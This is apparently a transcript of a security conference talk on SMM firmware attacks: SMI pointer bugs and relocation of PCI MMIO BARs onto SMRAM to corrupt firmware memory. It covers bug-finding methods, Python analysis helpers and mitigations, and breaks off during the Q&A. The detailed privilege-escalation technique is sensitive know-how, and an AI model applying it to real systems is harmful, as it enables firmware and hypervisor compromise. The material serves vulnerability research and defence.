unprotected memory, which a ring zero attacker can control, so he can make a privilege escalation to the SMM code. Then this vulnerability was fixed by adding a check in the SMI handlers, so the SMI handler checks that the address is not pointing into SMRAM. But what if we have a scenario where we have a hypervisor, or for example hypervisor-based protection like VSM, or just Hyper-V with a root partition? In that case, we can point the address in the general purpose register or in the CommBuffer to some structure of the hypervisor and overwrite it, and then the untrusted guest makes a privilege escalation from ring zero to the hypervisor. The interesting fact is that even if this vulnerability is patched in the firmware and the firmware is fully protected, the untrusted guest can still use it for privilege escalation, like a confused deputy attack: there is no vulnerability in the firmware, but you can still exploit it and get code execution in the hypervisor. And we demonstrated an exploit against VSM which basically used such a firmware vulnerability to compromise VSM and dump credentials. We made this demo in 2015. There was another example of an SMI pointer vulnerability found by ATR and then also published by Sogeti. That vulnerability is pretty similar to the ones we found: it reads the buffer address from a general purpose register and passes the buffer to the function ReadFlashData.
And the function ReadFlashData uses a read function where you control the offset of the destination, and you control the source and the size. In this case there are no checks on where the address points, so if your address is in SMRAM, you can dump, read and write SMRAM. A really nice write-up. There have also been a couple of presentations and blog posts published about different types of SMI pointer vulnerabilities. So how did the community and the vendors react to this, how do we fix it? There is a protection, which I already mentioned, to check that the address is not pointing into SMRAM, through the function SmmIsBufferOutsideSmmValid. It fixes the problem for the firmware, but it doesn't fix the problem for the hypervisor; the vulnerability can still be used for privilege escalation to the hypervisor. So to fix that, there was another mitigation added, to limit the CommBuffer address. The address should now be fixed, and there is an ACPI table, named the Windows SMM Security Mitigations ACPI Table (WSMT), which should be initialized by the firmware and read by the operating system, and which passes the configuration of the mitigations. There are a couple of bits in there. One defines that the comm buffer is fixed at a defined location and that SMM checks all of the input and output buffers. Another one is nested pointer protection, meaning that if you have a pointer inside the comm buffer, it checks those pointers as well. And another protection is that some of the hardware configuration is locked after ExitBootServices, for example the interrupt controller, the IOMMU and so on. That kind of mitigation was added after we published this research and communicated it to the vendors. Now a little bit about MMIO, because this bug really relies on the behavior of MMIO. In the system, to communicate with a device there is the PCI Express protocol, and in this protocol there is a fabric which contains multiple components, and those components are interconnected in certain topologies. In this topology there is a root complex which has multiple ports; there are endpoints, switches and bridges, and all of them are connected via PCI Express links. Every physical component has up to eight (virtual) functions, and some of them may be integrated into the root complex. So basically this protocol is designed to talk to the devices, send DMA and so on. Every device has PCI config space, and the PCI config space contains the header, then the PCI Express capability structure and the extended capabilities. The entire structure is 4K, but without the extensions it's 256 bytes. To get access to the PCI configuration there are two interfaces. One is to access PCI configuration space using the I/O ports CF8/CFC: we construct the address knowing the bus, device, function and the offset we want to read from the specific device, write it to CF8, and then read or write the data through CFC. That way we can read and write a specific register in the PCI configuration. To get access to the extended configuration space, we need to use the enhanced configuration access mechanism. It is memory mapped: we use a memory range which is split into 4K chunks per bus/device/function, and through that memory we can access the extended configuration space of the device and read registers from there. So to read them, we use the memory-mapped config base register plus bus times 32 times 8 times 4K, plus device times 8 times 4K, plus function times 4K, plus the offset.
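To make the two access mechanisms concrete, here is a small sketch (mine, not from the slides) computing both the legacy CF8 address and the ECAM memory address for a given bus/device/function/offset; the MMCFG base used in the example is only illustrative.

```python
# Legacy CF8/CFC address vs. ECAM (memory-mapped config) address for a given
# bus/device/function/offset, matching the formulas described above.
def cf8_address(bus: int, dev: int, fun: int, off: int) -> int:
    """Value written to I/O port 0xCF8; the data then moves through 0xCFC."""
    return (1 << 31) | (bus << 16) | (dev << 11) | (fun << 8) | (off & 0xFC)

def ecam_address(mmcfg_base: int, bus: int, dev: int, fun: int, off: int) -> int:
    """Physical address in the ECAM window:
    base + bus*(32*8*4K) + device*(8*4K) + function*4K + offset."""
    return mmcfg_base + (bus << 20) + (dev << 15) + (fun << 12) + off

if __name__ == "__main__":
    # Example: the BAR at offset 0x10 of bus 0, device 25, function 0, with an
    # MMCFG window assumed at 0xF8000000 purely for illustration.
    print(hex(cf8_address(0, 25, 0, 0x10)))               # 0x8000c810
    print(hex(ecam_address(0xF8000000, 0, 25, 0, 0x10)))  # 0xf80c8010
```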
Then we construct the address, use it as a memory access, and we can read and write registers. So basically all of that PCI configuration is for storing configuration registers for the device. But even 4K was not enough for modern devices; they want to store much more, like graphics wants to store megabytes. And this is where MMIO comes in. MMIO is a range of memory addresses, and accesses to that range are forwarded to the device, and the device handles them. These ranges are defined through MMIO BARs, and the MMIO BARs are in the PCI config space we were talking about on the previous slide. If you look, there is the header of the PCI configuration space with the device ID, vendor ID, status register and some other registers, and then Base Address Register 0 is the first MMIO BAR. As you see here, there is just the address, so we don't know the size. The BARs themselves are self-aligned, meaning that if you write all Fs to the BAR, the bits which didn't flip from zero to one are the bits which define the size of the MMIO BAR. For example, if one byte's worth of bits didn't flip, that means you have a 256-byte BAR. Here is a simplified version of the layout in memory, just to give a small picture of where MMIO sits. We have low DRAM, then there is SMRAM protected by SMRRs, and there is graphics memory. Then we have TOLUD, the top of low usable DRAM, and above it there is the memory-mapped config space, then low MMIO with all of the BARs which were defined through PCI config space, and the BIOS flash range, and above 4GB we have high DRAM. So all of the BARs should be defined somewhere here. And here are a couple of examples of MMIO BARs. There is the name of the BAR, like GTTMMADR, which is at bus 0, device 2, function 0, offset 0x10, and then it has the size, two megabytes. You can use the CHIPSEC tool and just run mmio list, and it prints the known MMIO BARs. One of the important aspects of the MMIO BAR registers is that they can be relocated at runtime, and the OS can relocate them to any other location. Some of the MMIO BARs are not relocatable; they are fixed or locked by the firmware. But some of them are relocatable, and now Yuri will explain why that is an issue. Hey everyone. I take it you can hear me. So I've just noticed that all of the animation that I spent hours on is pretty much gone from the slides. That's convenient; I guess that's the difference between PowerPoint and PowerPoint Viewer. Anyway, how is this related to what Alex has been talking about? These issues depend on this memory-mapped I/O configuration behavior. In fact, they are caused by the way firmware talks to the devices through memory-mapped I/O. So the way firmware uses this memory-mapped I/O mechanism and communicates with the devices is, and this applies specifically to the SMI handlers, but keep in mind that the entire firmware, including the boot firmware, regardless of which type of firmware it is, UEFI-based firmware or Coreboot-based firmware or just legacy BIOS or anything else, also talks to the devices through the memory-mapped I/O mechanism. So there is a PCI configuration space in each device, or actually each virtual device or function of a device has its own PCI configuration space, and it has this base address register which defines the base of the memory range for that particular device.
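The self-sizing probe mentioned a moment ago (write all Fs, see which bits stick) looks roughly like this; pci_read32/pci_write32 are hypothetical config-space helpers, and the example at the bottom just fakes a 4 KB memory BAR to show the arithmetic.

```python
# BAR self-sizing as described above: save the BAR, write all 1s, read back;
# the bits that did not stick encode the size/alignment. pci_read32/pci_write32
# are hypothetical config-space helpers (e.g. thin wrappers around a tool
# like chipsec).
def bar_size(pci_read32, pci_write32, bus, dev, fun, bar_off):
    original = pci_read32(bus, dev, fun, bar_off)
    pci_write32(bus, dev, fun, bar_off, 0xFFFFFFFF)
    probed = pci_read32(bus, dev, fun, bar_off)
    pci_write32(bus, dev, fun, bar_off, original)    # restore the BAR
    mask = probed & 0xFFFFFFF0                       # drop the low type/flag bits
    size = (~mask & 0xFFFFFFFF) + 1                  # e.g. 0xFFFFF000 -> 4 KB
    return original & 0xFFFFFFF0, size

if __name__ == "__main__":
    # Simulate a 4 KB memory BAR at 0xF7D00000 with a tiny fake config space,
    # just to show the arithmetic.
    regs = {0x10: 0xF7D00000}
    def rd(b, d, f, o): return regs[o]
    def wr(b, d, f, o, v): regs[o] = v & 0xFFFFF000  # device keeps only writable bits
    base, size = bar_size(rd, wr, 0, 2, 0, 0x10)
    print(hex(base), size)                           # 0xf7d00000 4096
```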
And so what SMI handlers usually do, as well as any other boot firmware: they read the base address register to get the base address of this MMIO range, and then they either read registers within that range, MMIO registers, or write those registers, or read-modify-write those registers, basically in order to send I/O cycles to that particular device. And so this is how they essentially communicate with the devices. Now the problem, the theory of the problem, is that there is an implicit trust assumption on the firmware side that those are hardware registers. They are part of the hardware, hardware is part of the trust boundary, and so firmware for the most part trusts all of the hardware, including those registers. There is an assumption that nobody can change them. However, those are just ring zero accessible registers that could be modified by any ring zero code. So that's one example of what ring zero code or OS-level code can do, or ring three code if it has enough privileges to talk to the PCI config space: modify PCI config registers like this BAR register. The problem is that ring zero code or OS-level code can modify those BAR registers and relocate the range for a particular device somewhere else in the physical address space. It could be somewhere in other MMIO, it could be overlapping with some other things, but it can also be in the DRAM, in system memory, and one particular location the attacker would be interested in is the system management mode memory. So the exploit code could modify and relocate the memory-mapped I/O range to overlap with SMRAM. Then, when an SMI interrupt is generated, either by hardware or by the attack code itself, the SMI handler firmware attempts to communicate with the device through this memory-mapped I/O range; it attempts to read or write registers. And so, instead of actually sending cycles to the device as MMIO cycles, which are memory cycles on the PCI bus, it sends memory transactions to its own memory, or some other memory, depending on where the attack code relocated this MMIO range. That can potentially expose data, because it reads its own memory, or modify the control flow somehow if it reads attacker-manipulated data, or it can corrupt memory because of the memory write cycles to the MMIO registers. So that's the theory of this problem. And what we've observed in multiple types of firmware, including UEFI and Coreboot firmware, is that the SMI handlers communicate with a lot of MMIO BARs. My examples include EHCI USB2 BARs; Gigabit Ethernet LAN; the root complex MMIO, which is the main MMIO range for the PCH, and specifically the SPI registers in there, in order to communicate with the SPI flash, write to it or read from it; the AHCI SATA controller MMIO; the XHCI USB3 controller; integrated graphics device MMIO, basically the GTT MMADR range for the graphics device; or some other MMIOs, for example, I think it's a LID controller or something, on a different bus on specific systems. It could be more. This is what we've seen. There might be a specific system that has a specific SMI handler which communicates with a specific device, or maybe has some functionality specific to that system communicating with a generic device. So this is an example.
This is an example of communicating with the SPI controller in order to read something from the SPI flash or write something to the SPI flash. So there are commands: the first command attempts to store a persistent configuration for the UEFI firmware into the SPI flash. It's called a UEFI variable, if you're familiar with that, but basically it's configuration of the firmware. So the first command attempts to store this configuration into the SPI flash. The second command just dumps the SPI memory-mapped range, all the registers; I don't show all the registers here, just the ones I'm interested in. And so you can see that there's a SPI status and control register, which tells the status of the SPI cycle and also sends that SPI cycle on the SPI bus. There's a SPI flash address register, which is programmed with the flash address on the SPI flash device. And there's also a whole bunch of registers that are programmed with the contents of what you want to write to the SPI flash, or what you want to read from the SPI flash. In this particular case, this is the contents of that variable that I've been writing in the first command. You can see all 42, 42, that's 'B', right? So the contents of the variable was all Bs, and you can see that all of these registers now contain the contents of the variable. So obviously, if we overlap this SPI memory range with something else, like SMRAM or some other protected page, then we can cause the contents of the variable to be written onto that range. So how do we find this type of issue? Obviously, the SMI handler is writing something to the SPI BAR, or to any MMIO BAR. So it looks like finding all those problems is as easy as: dump the contents of the MMIO range, cause the SMI, then dump again and see which registers changed during the SMI, and now you know that the SMI handler modified those registers. But it is a lot more complex than that. Initially we thought it would be that simple to identify those issues at runtime, but in reality it's pretty complex, and the reason is that those are not memory contents. In addition to the firmware, other parties are also writing to those registers: the hardware itself, the devices or integrated controllers, or some logic in the hardware, writes to those registers in pretty much any MMIO BAR. For example, in some of the BARs, like the graphics BARs, the hardware writes to thousands of registers in the MMIO range. So it's pretty difficult to actually identify which registers have been modified by the SMI code itself. So that's, at a high level, the entire flow of how we solved that problem. Basically, for every MMIO range, we dump the MMIO range multiple times with a delay, let's say 20 times, and we find all of the registers that normally change without SMI handlers. We add those registers to a list and call it the normal difference, or something like that. And then we trigger SMIs, or cause a function, like the variable write, that would trigger an SMI. After every SMI we dump that range again, see which registers have changed, and compare them with that normal difference, with the registers that normally change. If we see any new register that is not part of that normal difference, we suspect that this register might have been changed in the SMI handler. So we send the same SMI again, maybe even multiple times, to confirm that this register changes every time we send the same SMI.
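In pseudocode, the "normal difference" technique just described might look like the sketch below. dump_mmio() and trigger_smi() are hypothetical helpers standing in for an MMIO-dumping tool and for whatever operation fires the SMI under test.

```python
# Sketch of the "normal difference" technique described above. dump_mmio() is a
# hypothetical helper returning {offset: value} for one MMIO BAR, and
# trigger_smi() stands for whatever fires the SMI under test (e.g. a UEFI
# variable write).
import time

def registers_that_change(dump_mmio, samples=20, delay=0.1):
    """Offsets that change on their own, without any SMI (the 'normal diff')."""
    baseline = dump_mmio()
    noisy = set()
    for _ in range(samples):
        time.sleep(delay)
        current = dump_mmio()
        noisy |= {off for off, val in current.items() if val != baseline[off]}
    return noisy

def suspected_smi_writes(dump_mmio, trigger_smi, retries=3):
    noisy = registers_that_change(dump_mmio)
    before = dump_mmio()
    trigger_smi()
    after = dump_mmio()
    candidates = {off for off in after
                  if after[off] != before[off] and off not in noisy}
    # Re-trigger the same SMI a few times to weed out one-off device activity.
    confirmed = set(candidates)
    for _ in range(retries):
        before = dump_mmio()
        trigger_smi()
        after = dump_mmio()
        confirmed = {off for off in confirmed if after[off] != before[off]}
    return confirmed
```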
And even with that mechanism, there are lots of false positives, because even when we create the normal difference we don't catch all of the registers. So it happens that when you trigger an SMI, some register changes, but not really because of the SMI handler; the device just decided that at this moment it wants to write to that register. Oh, awesome. That's not the end. So that's an example of running this sort of tool that monitors the changes in an MMIO BAR. This particular example monitors changes in the EHCI USB BAR, and you can see that it created a normal difference with just two registers that normally change. Then it triggered multiple SMIs, and for the first SMI it found that one additional register changed, so it re-triggered that SMI, and that register didn't change again. It can also be a false negative, because the SMI handler might be flipping a bit, flipping it on, flipping it back, and so on. But this is a suspect to investigate later. So that was the theory about the issues. Now I'll give you a few examples of those issues in UEFI firmware as well as in Coreboot. We'll start with UEFI. So how do we find those issues in the binary? Let's say we have EFI binaries, we load them in IDA; how do we find those? One way of finding this type of issue is to find the places where the SMI handlers or the firmware read the contents of the base address register, because we know their addresses; for every device we know the address of the base address register. So for example, this GbE LAN MMIO BAR: the device has multiple MMIO ranges, and one of them is the so-called MBARA, the M-bar, which is defined by the BAR at offset 0x10. And the GbE LAN device is bus 0, device 25 (0x19), function 0. The firmware can use two mechanisms, as Alex described: one is the legacy mechanism through the CF8/CFC I/O ports, and one is the enhanced mechanism through the memory-mapped config space. For the first mechanism, the address of that BAR register is calculated as the device number left-shifted by 11 bits, plus the offset; there is also, of course, the bus number left-shifted by 16 bits and the function number left-shifted by 8 bits, but in this case it's bus zero and function zero. So we have an address for that register which is pretty unique in a lot of cases when it's used with the legacy PCI config access mechanism. And when you set the enable bit for the PCI config cycle, which is bit 31, you get 0x8000C810 for this BAR of the GbE LAN device. For the second mechanism, it's calculated similarly. You have the memory-mapped config space divided into four-kilobyte chunks for each bus/device/function, and the register is somewhere within the four-kilobyte chunk for that particular device. So you take the base address of this memory-mapped config space, add the offset of the four-kilobyte chunk for that particular device, and then find the register within that chunk. You calculate the offset to that register pretty similarly. And remember that this mechanism allows you to access all of the PCI header, all four kilobytes of registers, rather than just 256 bytes; that's why you have 0xC8010 instead of 0xC810 as in the previous mechanism. So you have a constant, this total physical address in memory for that particular BAR. Now you can identify all the places where the firmware uses or reads that BAR.
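One cheap way to triage a pile of extracted EFI modules is to search for those immediate constants directly; a rough sketch is below. Note this only catches handlers that embed the constant literally (the ECAM address is often computed at runtime, as the next example shows), and the MMCFG-based constant here assumes an 0xF8000000 window purely for illustration.

```python
# Quick triage over a directory of extracted EFI modules: search for the
# little-endian immediate constants computed above to find candidate modules
# that touch a given BAR. This only catches code that embeds the constant
# literally; ECAM-based accesses are often computed at runtime instead.
import pathlib
import struct

CONSTANTS = [
    0x8000C810,   # legacy CF8 value for bus 0, dev 25, fn 0, offset 0x10
    0xF80C8010,   # full ECAM address, assuming an MMCFG window at 0xF8000000
]

def scan(directory: str) -> None:
    for path in pathlib.Path(directory).rglob("*.efi"):
        data = path.read_bytes()
        for value in CONSTANTS:
            pos = data.find(struct.pack("<I", value))
            if pos != -1:
                print(f"{path}: {value:#010x} at file offset {pos:#x}")

if __name__ == "__main__":
    scan("extracted_modules")   # hypothetical directory of dumped SMM/DXE drivers
```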
Once you do that, you can figure out how the firmware uses that BAR. Does it check that the address is somewhere else, or does it not? Does it read or write the registers in the BAR? So this is the example for the GbE LAN MMIO BAR in device 25. This is the first one, we call it the M-bar MMIO, the yellow thing. And the second, no, sorry, the third access, the third constant, you can see is F80C80CC: that's reading a configuration register from the GbE LAN config space, but it's a different register, a BAR management control/status register. The BAR itself is the F80C8010, that's one of the reds, and that's where the firmware reads the actual address of the BAR. And then later on, you can see that the firmware is actually writing or reading some registers in that BAR. It's not very clear on this particular screenshot, so it's better to look at the next screenshot. Now you can see that the firmware is using that MMIO range, the M-bar range, and writing some values. It's writing some register value that the attacker controls, or writing some constant value, let's say this 7123, I don't know what that constant is, to the address at offset 32 decimal in this M-bar MMIO. So it's writing some values to the registers. And this is without actually checking: there's no check on that MMIO range, whether it overlaps with SMRAM or whether it's overlapping with something else. There's no checking. So basically, by modifying the M-bar in the config space of that GbE LAN device, you could potentially control where the SMI handler writes data. This is another example, for the USB MMIO BAR, and it's pretty similar. So you calculate... oh great, I didn't actually put in the final constant. But you can see that the USB base address register is read from offset 0x10 of the EHCI MMIO controller, and then there are accesses to offsets within that range, an access to offset 20 at the bottom of the slide, where it flips some bits. It doesn't write controlled values, it just flips bits. And this is also an example where in the assembly you don't see the actual constant, the full address in the memory-mapped config space, because the address is calculated; but you do see the address of the memory-mapped config space, and then you see the offset of the BAR register. So there are multiple ways to do this, and it also helps with finding those issues. It also helps to find the actual functions that read or write configuration space. The first function on the left uses the legacy PCI configuration mechanism through CF8/CFC; you can see the CF8/CFC ports there. The bottom one uses the enhanced mechanism: it uses memory-mapped configuration access to read and write configuration registers. The right part is just an example of how firmware uses that: you can see that it reads the register B8 in device 31 and then writes some value to that register. So it reads, modifies, writes. Yeah, actually it writes and then returns. So basically what it's doing is clearing status bits, most likely. So those were examples in UEFI firmware. Let's talk about those examples in Coreboot. By now you have probably understood that these issues are not really specific to the type of firmware used, because they depend on the platform architecture: it's the firmware trying to communicate with the PCIe endpoint devices on a platform that adheres to the PCIe architecture.
So regardless of which type of firmware you have, Coreboot or legacy BIOS or UEFI-based BIOS, those issues might exist. And because we have the source code for Coreboot (by the way, I just wanted to thank the Coreboot team, and Ron in particular, for working with us on this), we can look at the source code. To find those issues in Coreboot, you can do this: find the functions that read PCI configuration registers, as in the previous slides, in the source code, and then find the functions that write to the memory-mapped I/O ranges. In Coreboot in particular, those are the functions pci_read_config32 or pci_read_config16 to read the configuration registers, and then the functions write16/write32 or read16/read32 to read or write memory-mapped registers. So in this particular case, you can see that the firmware is reading the MMIO range base from the integrated graphics device at offset 0x10, and then it's writing a register at the PP_CONTROL offset of that graphics range with a specific value, which it calculates beforehand. Sometimes in the source code the developers name the BARs with the names defined in the platform specs, chipset specs or SoC specs, so for example on Intel systems you can find most of the BAR accesses just by their names, like RCBA, or SPIBAR, or the PCIe base address (PCIEXBAR), and so on. You can look up the BAR register names and essentially just grep the source code for them. So here is a particular example, the mainboard IO trap handler, an SMI handler in Coreboot. This SMI handler is not a software SMI handler, so it's not one you would trigger by writing some value to the 0xB2 I/O port. It's an SMI handler that is caused by the chipset trapping an I/O cycle to some other port; it's called the IO trap mechanism. I won't describe that mechanism in detail, but basically it's another way to trigger a lot of SMI handlers on these platforms, probably the second most used mechanism to generate SMIs. So what this SMI handler does: it reads an MMIO range base address from device 0 on bus 1, at offset 0x18, and then it checks one register, called LVTMA_BL_MOD_LEVEL, in that MMIO range. It checks whether the value is greater than 0x10; if it is, it tries to decrease it, and if it's less than 0xF0, it tries to increase it. So what it's doing is essentially trying to change the brightness. Basically, when you press a button on that Coreboot system, it generates an SMI, and depending on which button you pressed, it decreases or increases the brightness of the screen. It does that by reading the contents of the register, incrementing or decrementing it, and then writing it back. So potentially, by pressing the button and overlapping that BAR with something else like SMRAM, you can cause the SMI handler to overwrite itself and get a potential memory corruption or code execution. Or the ring zero attacker might generate that SMI on your behalf, without pressing the button. Another case in Coreboot firmware is another SMI handler, called backlight_off, which is very similar, but it's triggered when you press the power button and the system goes to S5, soft shutdown.
And so SMIs are generated, the firmware takes control, and it needs to turn off devices; it wants to turn off the brightness, no, not the brightness, it needs to turn off the backlight of the screen. I don't remember the specific system this SMI handler was on, but basically what it's doing is, again, reading the base for the MMIO range of the integrated graphics device, and it writes a different value to the same PP_CONTROL register on entering S5. So potentially, by entering S5, you can control the value written at that offset in the memory that you overlapped with the graphics device MMIO BAR. Or the attacker in this case would need to simulate the S5 trigger event, prevent the system from actually going into S5, but still cause the SMI handler to run by just directly invoking it. So by now you might have figured out that there are lots of moving parts in this type of bug. There are limitations. The first limitation for the exploit is that the SMI handlers, or any other firmware, write to specific offsets. So you don't fully control the address; you don't have an arbitrary write primitive. You only control the base address, plus a fixed offset. And the BARs, like Alex mentioned, are mostly self-aligned, or size-aligned. So if you have a four-kilobyte BAR, the MMIO range is aligned on a four-kilobyte boundary. This is not a requirement; it's just what most platforms do. Architecturally, the PCI-SIG architecture defines that BARs might be as small as 16 bytes and aligned at 16 bytes, so there might be MMIO ranges that are as small as 16 bytes, and then you have pretty fine granularity of the address that you control. But for four-kilobyte BARs you have quite a few possibilities to overwrite, and for larger BARs, say 16 kilobytes, that becomes more difficult. For BARs that are even larger, like the graphics device BAR, which is four megabytes, you have very few possibilities. And the exploit may not be able to control the values that are written, because the firmware or the SMI handler typically writes specific values, or flips specific bits at those offsets, or reads a value, modifies it somehow and writes it, or reads a value and writes it to some other register. So the exploit may not control the values, although, as you saw, for some MMIO ranges the exploit might control them: for example, in the variable write example, you saw that all of the contents of the variable are fully controlled. The other limitation is that because those are memory-mapped I/O ranges, not regular DRAM ranges, the firmware is actually implementing a protocol in a lot of cases. So it's not just writing, like, "I want to write zero to this offset". No, it usually implements some sort of protocol. And the protocol could be as simple as: read the value, and if that register has a specific value, or is greater or less than something, then write to somewhere else. That's easily controllable, because you don't just relocate the BAR into memory, you also create the contents in memory of all of the registers as if they were in the MMIO range, so you can control that.
But if the protocol is more complex, for example the firmware is issuing specific cycles on a specific bus, then it's typically writing to some registers, reading back other registers, polling on the values in those registers, and then writing something else. In that case you may not really be able to control it, because you only have one chance: you populated the fake MMIO range in memory, and if the firmware writes something and expects it to change, you're out of luck, because you don't have any agents running in parallel. In certain cases that might be bypassable on some platforms, but in the general case you're out of luck. Plus, there are lots of conditions: the SMI handler will write to that BAR depending on, say, the platform mode. Are we in ACPI mode or not? Does the device I'm communicating with support this functionality, this mode, this feature? And even triggering those SMIs that communicate with the devices might cause some complications, because it's not as simple as triggering an SMI by writing to port B2. No, the SMI handlers that you saw might be invoked when you enter S3, or resume from S3, or when you enter a soft shutdown, or something like that. So there is some complication in how you even trigger the interrupts. And for a certain number of BARs that are non-architectural, basically not defined in the PCI-compatible space below offset 0x40 in the PCI header, those BARs might be locked down by the firmware. There is a mechanism in the hardware that allows you to just lock down the register, and after you lock it down, nobody can change it until reset. So those BARs you cannot relocate. Of course, the firmware might forget to lock them down, as we've seen many times, and in that case you can relocate even lockable BARs. But if the firmware doesn't forget to lock down all the BARs, then you cannot relocate them to memory. You can relocate something else to overlap with the BAR, but that's a different story. So what are the options to mitigate these attacks? One option is that the SMI handlers can verify that the base address of the MMIO range they read from the BAR register doesn't overlap with SMRAM. That's a pretty straightforward mitigation, similar to the mitigation that was done for the previous class of issues, the pointer bugs, and it should be done; it doesn't hurt to check the pointer so that you're not writing over your own code. But it only solves the problem partially: it prevents you from overwriting the contents of SMRAM, but it doesn't prevent you from pointing the address that will be written at something else outside of SMRAM, say hypervisor-protected pages or Windows 10 VBS-protected pages. So in that case the mitigation might be different. The firmware and SMI handlers might verify that the base address of the MMIO range is actually in MMIO, in the memory map that you saw in Alex's part of the presentation: above the top of low usable DRAM. So you can check that the BAR is actually in that range and not pointing somewhere inside DRAM. That's a good mitigation, although you still might be writing to somewhere you shouldn't be able to write, so it's also a partial mitigation, I think. There is another option: when the system boots, the boot firmware might allocate a default, reserved range in the MMIO and place all the BARs there.
And when the SMI handlers are invoked at runtime, during OS execution, the SMI handler can check the value of the base address for the MMIO range and check whether it's within this default reserved range. If it's not, force it into the default range, its default location, and use the default location, and then upon exit just restore the value or leave it there; that depends on the firmware implementation. In this case you're forcing the SMI handler, the runtime firmware, to write to a known good, fixed location for the MMIO. That particular third mitigation was done for the SPI BAR, the example with the attacker-controlled contents of the variable that could be written by the exploit. In that case, starting with later Skylake systems, I think, the boot firmware allocates a range at 0xFE010000 in physical address space for the SPI MMIO range. And on any PCH-type SMI, a chipset-type SMI, the SMI handler checks that the base address of this SPI MMIO range is at that address, and if it's not, it overrides it with the default 0xFE010000 value. Then the SMI handler proceeds to do what it needs to do, basically preventing you from overlapping the range with anything else that you shouldn't have access to. So that's a screenshot with an example of this mitigation. First the attacker relocates the SPI BAR, overlaps it with something else, just regular DRAM memory, then causes the variable write that generates an SMI, and upon exit from the SMI I check the value of the SPI BAR, and you can see that it actually changed back to the default location. I'll try to show you that on this system. You may not be able to see it in the back, but you can check it later. So I'm reading offset 0x10 of device 31, function 5, which is the SPI controller on later systems. I'm reading it, and you can see it has the 0xFE010000 value. On this laptop the keyboard is typing numbers on its own, without my help. So now we'll check the number of SMIs; you can see that 0x15 SMIs have been generated so far. Then I'm relocating the BAR. Yeah. Sorry, since I started it, I'm showing that with the individual commands. So I'm relocating the BAR to this address, which is in memory; for the presentation I've prepared it and copied the contents of the SPI BAR into that memory. Checking the BAR again, you can see that it relocated: the SPI memory-mapped range now points into DRAM. And then I'm writing the contents of the variable. You can see that the write was successful, even though the SMI handler should not have had access to the SPI controller in this case, because I relocated the BAR to some bogus memory; it's not the SPI MMIO range any longer. So that's already a sign that the attack didn't really succeed. I read the contents of the BAR again, and you can see that it got restored to the original location. I check the number of SMIs, and you saw 0x15 there; now it's 0x19, so four SMIs were generated during this operation, one per logical CPU. And so I check the contents of the BAR, doing an MMIO dump of the SPI BAR, and I'll just dump it to somewhere here, an SPI log. And you can see that the contents of the variable that I wrote are actually in the MMIO range. So the variable that I wrote is this; it has all of the Bs, 0x42.
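What the demo just showed, check the BAR, force the known default, and only then talk to the device, reduces to logic like the sketch below. This is a conceptual model, not vendor code; the SMRAM range is made up and read_bar/write_bar are hypothetical helpers.

```python
# Conceptual model of the mitigation the demo just showed (not vendor code):
# validate the SPI BAR before touching the device and force the known-good
# default if anything looks off. All values and helpers here are placeholders.
SPIBAR_DEFAULT = 0xFE010000                      # reserved location from the demo
TSEG_BASE, TSEG_LIMIT = 0x8B000000, 0x8B800000   # example SMRAM range (made up)
SPIBAR_SIZE = 0x1000

def sanitized_spibar(read_bar, write_bar):
    """read_bar/write_bar are hypothetical PCI config helpers for the SPI BAR."""
    bar = read_bar() & 0xFFFFF000
    overlaps_smram = bar < TSEG_LIMIT and (bar + SPIBAR_SIZE) > TSEG_BASE
    if bar != SPIBAR_DEFAULT or overlaps_smram:
        write_bar(SPIBAR_DEFAULT)                # force the reserved MMIO location
        bar = SPIBAR_DEFAULT
    return bar                                   # only now talk to the SPI controller
```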
So that basically shows that this laptop, this system, restores the SPI MMIO range to the default location, and only then proceeds to communicate with the SPI flash device. All right, so we have a couple of tools that can find those issues at runtime. Obviously you can proceed with disassembling the binaries or looking at the source code, but we will release a couple of tools that will help with finding those issues. One just finds all of the registers that the SMI handler writes to or modifies, and the other one attempts to actually relocate all the MMIO ranges into memory, then fires the SMIs and sees if the memory contents changed. Neither of these tools is perfect, they give false positives and false negatives, so they need to be complemented with manual analysis. So the root cause of this type of issue is that the firmware assumes that all of the hardware is trusted, including all of the configuration registers for all the hardware devices or the entire chipset, and that they are not modified by some malicious code, for example because they are locked down. The firmware shouldn't assume that the contents of the base address registers are immutable, because any ring zero code can modify most of them, and they can be relocated to anywhere in memory, including on top of SMRAM itself. So the firmware should check the contents, the addresses, of those registers. This problem is not specific to SMM; SMM is a pretty obvious target here because it's runtime firmware, but even the boot firmware that reads the contents of some of those registers, say upon resume from sleep using the boot script, or reads the contents of MMIO ranges from somewhere else, like UEFI variables, can also be tricked into using memory ranges which are not really MMIO ranges but something else, and can potentially overwrite its own code. So the boot firmware should do the same thing as the runtime firmware. I think that's all. We have a couple of minutes for questions. Thank you for listening. Hello. Thanks, guys, for your talk. You were talking about the goal of getting code execution in the context of the SMI. Have you seen this type of attack utilized in a virtualized environment, where if you're a guest and the hypervisor is allowing passthrough to PCI devices, you cause a relocation so that you would overwrite into the host kernel or something like that, to break out? Yeah, thanks for the question. We haven't verified all of the hypervisors, but we have done some analysis on, let's say, VSM, and when you are in the Windows 10 normal world partition, it allows you to write to the BAR registers. We have not done the full analysis of whether this can or cannot be used as an attack, but at least the entry points are there. And for other hypervisors, if it would be possible to use this type of attack against the hypervisor, then that might only be possible from administrative guests, not from unprivileged guests. Okay. And then one other quick question. You were talking about how a lot of the behavior in the SMIs is a read, modify, write. So I was just thinking, with this vector, if you had an offset into a kernel where you would have a predictable increment of a counter, is there a way basically to block it, when it looks like increments in normal behavior? Does that make sense? It does. I'm definitely not sure that there is a way to block it at the kernel level.
But also, I don't think you would attack the kernel itself with this, because in the general case you have to have access to the PCI configuration space of the devices in order to relocate the memory-mapped base addresses somewhere else in memory. And that already assumes that you have write access to the PCI config space, which is ring zero in the majority of cases. So you wouldn't use this attack to attack the kernel, I guess. Right. Well, I was thinking in the virtualized environment. But yes. Oh, yeah, okay. So in the virtualized environment, sorry: the hypervisor might prevent that. The first way to prevent it is to not allow any guest, including an administrative guest, to modify the base addresses of MMIO ranges. That's the first, pretty straightforward thing that should be done. But you can also monitor memory with extended page tables and cause EPT violations on certain events; that would be, I guess, performance heavy. Hi. Thanks for the interesting talk. I have a question regarding the relocation of the MMIO BAR register that you were talking about in the last slides. You said that some new SMI handlers may verify the contents of the register and restore it to the original location, right? But the thing I have not understood is that the hardware has been designed this way for a reason: maybe some device would like to relocate the MMIO BAR register for some reason related to accessing the memory-mapped registers. And my question is, how can you recognize when it's legal to do that and when it's not? I mean, there is some way to trigger a hardware SMI handler from software. Let me see, Andrea, you had multiple questions in the same question. So, which software can legitimately modify the base address registers for the MMIO BARs? Exactly. Generally, the PCI architecture allows the OS to relocate MMIO ranges at any time. In a lot of cases I don't think that happens often, 